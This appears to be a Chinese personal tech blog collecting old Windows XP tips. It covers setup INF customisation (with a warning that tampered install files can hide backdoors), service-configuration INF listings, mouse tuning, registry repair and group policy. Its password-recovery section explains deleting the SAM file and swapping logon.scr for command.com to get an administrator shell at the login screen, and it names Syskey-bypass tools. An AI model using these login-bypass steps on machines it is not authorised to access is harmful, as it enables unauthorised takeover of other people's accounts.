winT's Blog
关于作者
|
用户名:52net 笔名:winT 地区: 甘肃—兰州 行业:其他 |
日历 年月日
| 日 | 一 | 二 | 三 | 四 | 五 | 六 |
快速登录
搜索
最新文章
winT'S Blog
http://blog.av3c.comblog
网络安全
软件门户站点
综合资讯门户站点
winT's Blog
欢迎访问我的新博客:http://www.av3c.com/blog/文章
【重要】警惕:不要随意安装来路不明的windows
在安装Windows xp 和 2003 操作系统的时候,它们都使用4个.inf 文件(在安装光盘的i386目录里) 来建立注册表,黑客们可以轻而易举的自定义这四个文件来改变你的系统配置(比如留个后门什么的,或许微软公司早就通过类似的方式来收集你的电脑信息)。
这四个文件是:
hivecls.inf -- 设置注册表的HKLM\SOFTWARE\Classes (HKCR)
hivedef.inf -- 设置注册表的HKU\.DEFAULT (默认用户的配置)
hivesft.inf -- 设置注册表的HKLM\SOFTWARE
hivesys.inf -- 设置注册表的HKLM\SYSTEM
黑客们可以通过改变这四个文件而达到改变操作系统默认配置的目的。比如,把默认的"我的文档"转移到其他分区,或者配合dosnet.inf/txtsetup.sif/layout.inf可以强制复制数个文件并执行一段恶意代码。
要注意:这些INF文件并不会被Windows 的系统文件保护程序所扫描到,它们也没有像其他重要文件一样需要数字签名认证,所以黑客们要修改它们而不让你察觉是一件容易的事情!
当然了,你也可以利用这些文件来自定义你的Windows 安装。
比如,你们是不是为每次重装系统都要进行服务优化而烦恼呢?那么,你可以通过修改这些文件来控制Windows 系统启动时的服务状态,或者添加自己的服务:
说明:
"0x00000004"表示"禁用"
"0x00000003"表示"手动"
"0x00000002"表示"自动"
以下是Windows XP (专业版)默认的服务配置
源代码:
[Version]
Signature=$CHICAGO$
[DefaultInstall]
AddReg=HKLM.Settings
[HKLM.Settings]
;
; 0x00000002 -- Automatic
; 0x00000003 -- Manual
; 0x00000004 -- Disabled
;
; set up services windows xp professional defaults
;
HKLM,%SERVICES_PATH%\Alerter,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\ALG,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\AppMgmt,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\AudioSrv,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\BITS,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\Browser,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\cisvc,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\ClipSrv,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\COMSysApp,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\CryptSvc,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\Dhcp,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\dmadmin,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\dmserver,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\Dnscache,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\ERSvc,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\Eventlog,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\EventSystem,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\FastUserSwitchingCompatibility,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\helpsvc,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\HidServ,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\ImapiService,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\lanmanserver,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\lanmanworkstation,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\LmHosts,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\Messenger,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\mnmsrvc,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\MSDTC,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\MSIServer,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\NetDDE,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\NetDDEdsdm,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\Netlogon,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\Netman,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\Nla,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\NtLmSsp,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\NtmsSvc,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\PlugPlay,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\PolicyAgent,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\ProtectedStorage,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\RasAuto,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\RasMan,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\RDSessMgr,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\RemoteAccess,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\RemoteRegistry,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\RpcLocator,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\RpcSs,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\RSVP,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\SamSs,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\SCardDrv,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\SCardSvr,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\Schedule,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\seclogon,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\SENS,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\SharedAccess,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\ShellHWDetection,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\Spooler,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\srservice,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\SSDPSRV,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\stisvc,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\SwPrv,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\SysmonLog,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\TapiSrv,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\TermService,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\Themes,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\TlntSvr,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\TrkWks,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\uploadmgr,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\upnphost,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\UPS,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\VSS,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\W32Time,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\WebClient,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\winmgmt,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\WmdmPmSp,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\Wmi,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\WmiApSrv,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\wuauserv,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\WZCSVC,Start,0x10001,0x00000002
[Strings]
;
; add this to strings section
;
SERVICES_PATH="SYSTEM\CurrentControlSet\Services"
以下是优化服务的代码:
[Version]
Signature=$CHICAGO$
[DefaultInstall]
AddReg=HKLM.Settings
[HKLM.Settings]
;
; 0x00000002 -- Automatic
; 0x00000003 -- Manual
; 0x00000004 -- Disabled
;
; set up services for a supatweaked games machine
;
HKLM,%SERVICES_PATH%\Alerter,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\ALG,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\AppMgmt,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\AudioSrv,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\BITS,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Browser,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\cisvc,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\ClipSrv,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\COMSysApp,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\CryptSvc,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Dhcp,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\dmadmin,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\dmserver,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Dnscache,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\ERSvc,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Eventlog,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\EventSystem,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\FastUserSwitchingCompatibility,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\helpsvc,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\HidServ,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\ImapiService,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\lanmanserver,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\lanmanworkstation,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\LmHosts,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Messenger,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\mnmsrvc,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\MSDTC,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\MSIServer,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\NetDDE,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\NetDDEdsdm,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Netlogon,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Netman,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\Nla,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\NtLmSsp,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\NtmsSvc,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\PlugPlay,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\PolicyAgent,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\ProtectedStorage,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\RasAuto,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\RasMan,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\RDSessMgr,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\RemoteAccess,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\RemoteRegistry,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\RpcLocator,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\RpcSs,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\RSVP,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\SamSs,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\SCardDrv,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\SCardSvr,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Schedule,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\seclogon,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\SENS,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\SharedAccess,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\ShellHWDetection,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Spooler,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\srservice,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\SSDPSRV,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\stisvc,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\SwPrv,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\SysmonLog,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\TapiSrv,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\TermService,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Themes,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\TlntSvr,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\TrkWks,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\uploadmgr,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\upnphost,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\UPS,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\VSS,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\W32Time,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\WebClient,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\winmgmt,Start,0x10001,0x00000002
HKLM,%SERVICES_PATH%\WmdmPmSp,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\Wmi,Start,0x10001,0x00000003
HKLM,%SERVICES_PATH%\WmiApSrv,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\wuauserv,Start,0x10001,0x00000004
HKLM,%SERVICES_PATH%\WZCSVC,Start,0x10001,0x00000004
[Strings]
;
; add this to strings section
;
SERVICES_PATH="SYSTEM\CurrentControlSet\Services"
Windows XP密码复原术
Windows XP的安全性能比以前的Windows 9x提高了许多,我们可以通过建立个人用户设置密码来保护自己的秘密,但是如果有一天我们自己忘记了这个登录密码那该怎么办呢?难道除了格式化硬盘重装系统,就没有别的方法了吗?不!让我们一起来寻找恢复Windows XP登录的秘技吧。
1. 创建修复用户密码的启动软盘
微软在Windows XP中为我们提供了一个创建修复用户密码的启动软盘的功能,在我们忘记密码时,可以通过这张软盘来启动电脑,所以我们应该事先做张密码启动盘以防万一。点击"开始"\"控制面板"中的"用户账户"选项,在弹出的对话窗口中选择自己的账户便会进入自己账户的控制界面,紧接着点击窗口左上方的"阻止一个已忘记的密码"选项,则进入"忘记密码向导"对话框。点击"下一步",这时向导提示将一张空白的已经格式化的磁盘插入到软驱中,然后再点击"下一步"按钮,向导提示输入这个账户现在的密码,输人后经过几秒钟便创建完成密码启动盘了。当我们有一天忘记自己的密码时,只要点击我们账户右边的箭头,然后在弹出的提示栏中点击"使用密码重设磁盘",再将先前做好的密码启动盘插入软驱,按照系统提示就可以重新设置密码并登录Windows XP了。此方法适宜于各种分区格式的Windows XP。
2. 通过双系统删除Windows XP登录密码
如果我们的机器中除了Windows XP外还有其它操作系统的话,可以使用另外一个操作系统启动,然后删除"C\Windows\System32\Comfig"目录下的"SAM"文件(这里假设Windows XP安装在C盘),即账号密码数据库文件。然后重新启动Windows XP,这时管理员"administrator"账号就没有密码了。举一反三,如果只有一个Windows XP系统,也可以取下硬盘换到其它机器上将SAM文件删除。
此方法适用于采用FAT32分区安装的Windows XP,如果是采用NTFS分区安装的,要保证其它系统能访问NTFS分区才行。
3. 使用NTFSDOS工具恢复Windows XP登录密码
首先从"http//www.cgsecurity.org/index.html﹖ntfs.html"下载一个名为"NTFSDOS"的工具,通过这个工具制作出一张可以从DOS下操作NTFS分区的启动盘。启动DOS后切换到系统目录,如"C\Windows\System32",将"logon.scr"更名为"logon.scr.bak",再复制一个"command.com"并将文件更名为"logon.scr"。然后重新启动机器,当启动屏幕保护时,你会发现屏幕显示为命令行模式,而且是有administratoc权限的,通过这个就可修改密码或添加新管理员账号。进入Windows XP后再将"logon.scr.bak"屏幕保护程序的名字改回来即可。此法适用于在NTFS分区安装的Windows XP。
4. 使用其它工具重建Windows XP登录密码
在网上可以找到很多Windows XP登录工具,比如使用Linux Boot Disks的启动盘可访问NTFS文件系统,并能读取注册表、重写账号和密码;使用NTAcess工具可绕过系统Syskey的保护,重新设定Windows NT/2000、Windows XP上的密码;还有Passware Kit、O&O Bluecon2000等工具,具体操作大家可以参考各软件的说明。
让你的鼠标更灵活(喜欢游戏的好好看看哦)
整台电脑中最普通的也是最容易被忽略的部件恐怕就是鼠标了。有没有觉得你的鼠标用起来单调无趣?有没有对它产生厌倦?还是看看我们下面的介绍吧,也许经过一番调整后你会发现它移动起来更加平滑、对你的输入指令反应更加灵敏,更符合你个人的需要。本文所提及的内容都通过了Windows 9x/Me/ 2000的测试,完全可以放心。
一、经常清理
我们大多数人选择的机械鼠标经过几周使用后,就会发现它的反应不再像最开始时那么灵敏了。这主要是由于鼠标内部的滚轮沾上了灰尘,而光电鼠标就没有类似的问题。解决的方法其实很简单,只需先将鼠标的感应球移走,然后拧下底部的螺丝把鼠标打开,将鼠标内沾染的污垢彻底清理干净就是了。每个月或者隔几周对鼠标定期进行清理可以使它的移动保持平滑流畅。
二、为鼠标找个舒服的家
几乎所有使用机械鼠标的人都会为自己的鼠标配上一块鼠标垫,因此鼠标垫是否好用对鼠标也有相当大的影响。华而不实向来是不可取的,所以还是去买一块对感应球的滚动能产生恰如其分的阻力且表面平整的鼠标垫吧,千万不要只顾好看而委屈了自己的手。
三、驱动程序是关键
鼠标的驱动是一个很重要但经常被人忽视的环节。最新鼠标驱动程序同样也可以丰富鼠标的功能,而且还可以修改旧驱动中的一些错误。你可以按自己的喜好下载微软http//www.microsoft.com/products/hardware/mouse/driver/drivers.htm或罗技http://www.logitech.com/cf/support/mousefiles.cfm推出的最新的鼠标驱动。
为了确定你的系统是否安装了最新的鼠标驱动,你可以右键单击"我的电脑"选择"属性"。
如果你使用的Windows 2000,请按下述方法检查:选择"硬件"选项卡,而后选择"设备管理器",打开"Mice and other pointing devices"一栏,选中你正在使用的鼠标名称之后点击下方的"属性"按钮。在随后弹出的对话框中选择"驱动程序"选项卡,然后单击"升级驱动"按钮来启动升级设备驱动程序向导,再输入你的驱动程序的路径。当系统找到新的驱动安装完毕后,重启你的电脑。
如果你使用的是Windows 9x/Me,请按下述方法检查:选择"设备管理器",打开"鼠标"一栏,选中你正在使用的鼠标名称后点击下方的"属性"按钮,在随后弹出的对话框中选择"驱动程序"选项卡,然后单击"升级驱动"按钮来启动升级设备驱动程序向导,再输入你的驱动程序的路径。当系统找到新的驱动安装完毕后,重启你的电脑。
四、出现问题不要急
很多与鼠标有关的麻烦都发生在游戏过程中,下面我们就给你提供一些建议来修正这些问题。
1.安装最新的鼠标驱动或者最新的游戏补丁程序。
2.如果发现你的鼠标滚轮无法工作,点击开始→设置→控制面板→鼠标。在按钮选项卡中重新设定滚轮的功能。在游戏的控制设置中也作同样设置。
五、不同鼠标不同对待
当今的鼠标大多采用USB或是PS/2接口,这两种接口都有各自的优劣。
USB接口鼠标的默认采样率比较高,达到125Hz;而PS/2接口的鼠标仅有40Hz(Windows 9x/Me)或是60Hz(Windows NT/2000)。不过在本文的后面你可以看到,把它调高只需相当简单的几个步骤。
USB接口鼠标对CPU的占用比PS/2接口鼠标大(当系统占用CPU比较大时,鼠标会让你觉得它有点不稳定)。不过你可以通过下面几步调整USB鼠标的表现。用右键单击我的电脑→属性→设备管理器(在Windows 2000中首先要选定"硬件"选项卡)。在设备管理器中找到"通用串行总线控制",然后选择USB Root Hub下方的设备,比如VIA Tech 3038 PCI to USB Universal Host Controller。把它打开然后选择"高级",而后将"禁用USB错误探测"前方的方框打上勾,最后重新启动系统就可以了。这可以明显改进USB鼠标及其它USB设备对系统做出反应的灵敏度。
六、鼠标的调整
下面我们向你介绍如何调整微软智能鼠标在Intellipoint 3.2软件安装后的设置。当然,这些设置在其它鼠标软件中也大多存在,比如罗技的Logitech Mouseware。
依次点击开始→设置→鼠标,打开鼠标属性窗口:
1.选择"按钮"选项卡
"设备":在该项的下拉菜单中选择你所使用的鼠标类型。
"按钮分配":使用这一选项为你的鼠标的各个键或是滚动轮分配不同的任务,选择你自己习惯的设置或是采用软件的默认设置都可以。
2.选择"指针"选项卡
"方案":在该项的下拉菜单中不同的戍边指针方案中选一款你最喜欢的,不过笔者建议你选择"无"或者干脆在下面的自定义设置中自己设计一套方案。
3.选择"指针选项"选项卡
"指针速度":利用这一项中的滑动条调整鼠标的响应速度。把滑动块向右移将使鼠标移动更加灵活,但是也更不容易支配,一般还是选择居中的位置比较好。这项设置还将影响将指针移动到屏幕指定位置时鼠标滑动的距离大小。将滑动块移动到慢的一侧将使鼠标移动的距离更长。
点下"高级"按钮,你可以设定是否在移动鼠标时调整指针加速的快慢,不过笔者还是建议你不要选中这一项。
"对齐到":选中这一项将使鼠标指针自动移动到可以打开的对话框的默认的按钮处,笔者建议不要选中该项。
"轨迹":这一项在Windows 9x/Me中可以调整移动鼠标时显示出的指针轨迹的长度,从实际应用来看这一项根本毫无益处,所以还是不要选中为好。
"键入时隐藏指针":这一项可以让鼠标指针在你打字时消失,反之则保持显示指针。你可以根据个人喜好决定是否选中该项。
4.选择"活动"选项卡
"双击速度":这一项下的滑动块可以调整完成鼠标双击的速度。
"方向":这个设置可以通过握住和移动鼠标的方式来改变指针移动方向,点中"设置方向"按钮,随着向导的步骤,你可以完成设定。
"单击锁定":选中这一项可以打开单击锁定功能,这样你就不用持续按下鼠标的按键也可以完成复制或是移动文件或文件夹时的拖动。
该项下的"设置"按钮可以调定在按下鼠标多长时间后实现单击锁定功能。
5.选择"滑轮"选项卡
"滚动":在选项中,你可以设定滚动滑轮的一个齿格后页面滚动多少行。笔者建议你还是保留默认的行数3,当然了,你也完全可以按自己的习惯来设定。
"滑轮疑难解答":除非你在使用鼠标的过程中有什么问题无法解决,否则不用理会这个选项。
如果你用的是PS/2接口的鼠标,那么在Windows 2000中还有一些特别的设置是Windows 9x/Me中所没有的。右键单击"我的电脑"选择"属性",再选择"硬件"选项卡,而后选择"设备管理器",打开鼠标的"属性"窗口,选择"高级"选项卡。
"采样率":这一项可以设定系统间隔多少时间确认一次鼠标的位置,通过对它的调整可以改变鼠标的灵敏程度。
"滑轮探测":这一项可以更改Windows 2000对鼠标滚轮的设定。如果你的鼠标不是滚轮鼠标或者因为其它原因你不希望使用滚轮,你可以选用"禁用探测"。
"寻找滑轮":可以自动探测你的鼠标是否具备滚轮,如果探测成功则启用,反之则禁用。如果你的鼠标具备滚轮则可以选用"假定滑轮存在";如果系统自动探测不到你的鼠标的滚轮你也可以选用这一项。
"输入缓存":这个设置可以调整输入缓存包(主要用来存储关于鼠标位置的数据)的数量。如果你发现自己的鼠标行为怪异,那么就需要尝试增加这个数值,不过一般情况下可将其忽略过去,保持其最小值:100。
"快速初始化":选中这一项可以实现快速初始化,这可以节省Windows 2000的启动时间。如果你选中该项后发现鼠标的运动不太听话,那么就不要选它,系统的启动时间并不会延长太多。
七、榨取鼠标的最后一滴油
如果你的电脑安装的操作系统是Windows 9x/Me,那么系统没有提供鼠标采样率的设置,你必须安装一个第三方软件完成设定。笔者推荐使用PS2Rate Plus(tweakfiles.com/input/ps2rateplus.html)。不过要提醒你的是,采样率设置得越高,CPU的占用也就越大,所以不要将其设定得过高。
相信经过以上的过程,你已经让你的鼠标更听话了,在游戏中你可能还需要鼠标反应更灵敏,运动起来更平滑,那么还要根据不同的游戏和你的喜好、习惯对鼠标进行更细致的设定。只有经过反复的尝试才会让你更加满意。
寻找“添加/删除”菜单中隐藏了的选项
不喜欢MSN Messenger吗,或是想把Windows Media Player媒体播放器给删掉?可惜打开控制面板中的"添加/删除程序",Windows XP自带的程序都不在里面。其实很容易找到,只需用记事本打开Windows\inf\sysoc.inf文件,找到类似下面这一段:
[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7
这是当前所有已安装部件列表,以MSN Messenger为例子,这个程序条目名是"msmsgs",在倒数第三行。可以看到被我标为红色的"hide"字样,就是这个参数在控制Windows"添加/删除程序"中不显示这一项。只需把"hide"删掉就得了,如下:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
改为:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7
现在重新启动计算机,就可以在"添加/删除程序"列表里看到MSN Messenger了。如果想要在添加/删除程序里看到所有的已安装组件,只需用记事本打开sysoc.inf文件,用记事本的查找/替换功能把所有",hide"替换为","就行了。
注册表损坏之症状和修复
Windows的注册表实际上是一个数据库,它包含了五个方面的信息,即PC的全部硬件、软件设置、当前配置、动态状态及用户特定设置等内容,主要储存在C:windows下的system.dat和user.dat两个文件中。由此可见注册表是Windows系统的命根子,稍有闪失,后果严重。注册表文件损坏而不能正常启动系统或运行应用程序的情况经常出现,那么注册表损坏一般存在哪些症状呢?
1、当使用过去正常工作的程序时,得到诸如"找不到*.dll"的信息,或其他表明程序部分丢失和不能定位的信息。
2、应用程序出现"找不到服务器上的嵌入对象"或"找不到OLE控件"这样的错误提示。
3、当单击某个文档时,Windows给出"找不到应用程序打开这种类型的文档"信息,即使安装了正确的应用程序且文档的扩展名(或文件类型)正确。
4、"资源管理器"页面包含没有图标的文件夹、文件或者意料之外的奇怪图标。
5、"开始"菜单或"控制面板"项目丢失或变灰而处于不可激活状态。
6、网络连接不能建立或不再出现在"拨号网络"中或"控制面板"的"网络"中。
7、不久前工作正常的硬件设备不再起作用或不再出现在"设备管理器"的列表中。
8、Windows系统根本不能启动,或仅能以安全模式或MS-DOS模式启动。
9、Windows系统显示"注册表损坏"这样的信息。
10、启动时,系统调用注册表扫描工具对注册表文件进行检查,然后提示当前注册表已损坏,将用注册表的备份文件进行修复,并要求重新启动系统。而上述过程往往要重复数次才能进入系统。其实此乃系统的误报,此时的注册表并没有损坏,倒是你的内存条或硬盘值得好好检查一下,这是硬件故障造成的假象。
以上罗列了注册表损坏的十种症状,除第十项外,前九项都是可以简单修复的,前提是有注册表文件备份。备份的方法也不难,在机器工作正常时,运行注册表编辑器regedit.exe,选择"注册表/导出注册表文件",接下来"导出范围"选择"全部","存为类型"选择"注册表文件",最后任取一个文件名(如"backup")就行了;也可以直接拷贝"system.dat"和"user.dat"两个文件进行备份。修复时进入DOS模式状态(开机时按"F8"调出多重引导菜单,选择"Command Prompt Only"),在提示符后键入"regedit/c backup.reg"回车即可。倘若没有备份,我们可以利用Windows的自动备份进行修复,同样进入DOS实模式状态,键入"scanreg /restore",进入菜单界面,选择一个备份文件,稍等片刻即可。
Windows组策略应用全攻略
简单点说,组策略就是修改注册表中的配置。当然,组策略使用自己更完善的管理组织方法,可以对各种对象中的设置进行管理和配置,远比手工修改注册表方便、灵活,功能也更加强大。
一、什么是组策略
(一)组策略有什么用?
说到组策略,就不得不提注册表。注册表是Windows系统中保存系统、应用软件配置的数据库,随着Windows功能的越来越丰富,注册表里的配置项目也越来越多。很多配置都是 可以自定义设置的,但这些配置发布在注册表的各个角落,如果是手工配置,可想是多么困难和烦杂。而组策略则将系统重要的配置功能汇集成各种配置模块,供管理人员直接使用,从而达到方便管理计算机的目的。
简单点说,组策略就是修改注册表中的配置。当然,组策略使用自己更完善的管理组织方法,可以对各种对象中的设置进行管理和配置,远比手工修改注册表方便、灵活,功能也更加强大。
(二)组策略的版本
大部分Windows 9X/NT用户可能听过"系统策略"的概念,而我们现在大部分听到的则是"组策略"这个名字。其实组策略是系统策略的更高级扩展,它是由Windows 9X/NT的"系统策略"发展而来的,具有更多的管理模板和更灵活的设置对象及更多的功能,目前主要应用于Windows 2000/XP/2003系统。
早期系统策略的运行机制是通过策略管理模板,定义特定的.POL(通常是Config.pol)文件。当用户登录的时候,它会重写注册表中的设置值。当然,系统策略编辑器也支持对当前注册表的修改,另外也支持连接网络计算机并对其注册表进行设置。而组策略及其工具,则是对当前注册表进行直接修改。显然,Windows 2000/XP/2003系统的网络功能是其最大的特色之处,其网络功能自然是不可少的,因此组策略工具还可以打开网络上的计算机进行配置,甚至可以打开某个Active Directory 对象(即站点、域或组织单位)并对它进行设置。这是以前"系统策略编辑器"工具无法做到的。
无论是系统策略还是组策略,它们的基本原理都是修改注册表中相应的配置项目,从而达到配置计算机的目的,只是它们的一些运行机制发生了变化和扩展而已。
二、组策略中的管理模板
在Windows 2000/XP/2003目录中包含了几个 .adm 文件。这些文件是文本文件,称为"管理模板",它们为组策略管理模板项目提供策略信息。
在Windows 9X系统中,默认的admin.adm管理模板即保存在策略编辑器同一个文件夹中。而在Windows 2000/XP/2003的系统文件夹的inf文件夹中,包含了默认安装下的4个模板文件,分别为:
1)System.adm:默认情况下安装在"组策略"中,用于系统设置。
2)Inetres.adm:默认情况下安装在"组策略"中;用于Internet Explorer策略设置。
3)Wmplayer.adm:用于Windows Media Player 设置。
